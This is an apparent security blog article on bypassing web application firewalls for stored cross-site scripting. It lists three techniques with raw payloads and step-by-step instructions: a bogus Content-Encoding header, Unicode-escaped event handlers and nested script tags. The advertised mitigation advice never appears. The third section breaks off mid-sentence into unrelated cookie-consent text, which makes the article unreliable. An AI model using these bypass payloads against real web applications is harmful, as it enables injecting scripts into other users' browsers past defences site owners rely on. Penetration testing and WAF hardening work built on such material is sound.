WAF Bypass Techniques for Stored XSS Vulnerabilities

Listen to this Post

🐢▶️ Listen🚀

Introduction

Web Application Firewalls (WAFs) are critical security measures designed to block malicious payloads, including Stored Cross-Site Scripting (XSS) attacks. However, attackers often find creative ways to bypass these protections. This article explores a simple yet effective WAF bypass technique involving HTTP headers and provides actionable insights for both penetration testers and defenders.

Learning Objectives

• Understand how WAFs detect and block Stored XSS payloads.
• Learn a verified bypass technique using `Content-Encoding` header manipulation.
• Discover mitigation strategies to protect web applications from such bypasses.

1. WAF Bypass via `Content-Encoding` Header

Verified Command/Code Snippet

POST /vulnerable-endpoint HTTP/1.1 
Host: target.com 
Content-Type: application/x-www-form-urlencoded 
Content-Encoding: random_text

name=<script>alert(1)</script>&submit=true 

Step-by-Step Guide

1. Identify a Stored XSS Entry Point – Find a form or input field where user-supplied data is stored and later rendered.
2. Craft a Malicious Payload – Use a basic XSS payload like <script>alert(1)</script>.
3. Add a Bogus `Content-Encoding` Header – Some WAFs fail to decode or inspect payloads when this header is present.
4. Submit the Request – If the WAF misinterprets the encoding, the payload may bypass detection and execute upon rendering.

2. Alternative Bypass: Obfuscated JavaScript

Verified Payload

<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)"> 

Step-by-Step Guide

1. Use Unicode Escape Sequences – Convert JavaScript functions (alert) into escaped characters.
2. Embed in HTML Event Handlers – Use attributes like `onerror` or onload.
3. Test Against WAF Rules – Some WAFs fail to normalize Unicode, allowing execution.

3. Bypassing WAFs with Broken Parsing

Verified Technique

GET /search?q=<scr<script>ipt>prompt(1)</script> HTTP/1.1 

Step-by-Step Guide

1. Nested Tags – Insert redundant characters (<scr<script>ipt>) to confuse WAF parsers.
2. Test for Filter Evasion – Some WAFs remove only the first `
   Manage Consent

   To provide the best experiences, we use technologies like cookies to store and/or access device information. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent may adversely affect certain features and functions.

   We do not sell your personal data. If you wish to exercise your rights under applicable privacy laws, please visit our Do Not Sell My Personal Information page.

   Functional Functional Always active

   The technical storage or access is strictly necessary for the legitimate purpose of enabling the use of a specific service explicitly requested by the subscriber or user, or for the sole purpose of carrying out the transmission of a communication over an electronic communications network.

   Preferences Preferences

   The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.

   Statistics Statistics

   The technical storage or access that is used exclusively for statistical purposes. The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.

   Marketing Marketing

   The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.

   • Manage options
   • Manage services
   • Manage {vendor_count} vendors
   • Read more about these purposes

   Accept Deny View preferences Save preferences View preferences

   • {title}
   • {title}
   • {title}
   Manage consent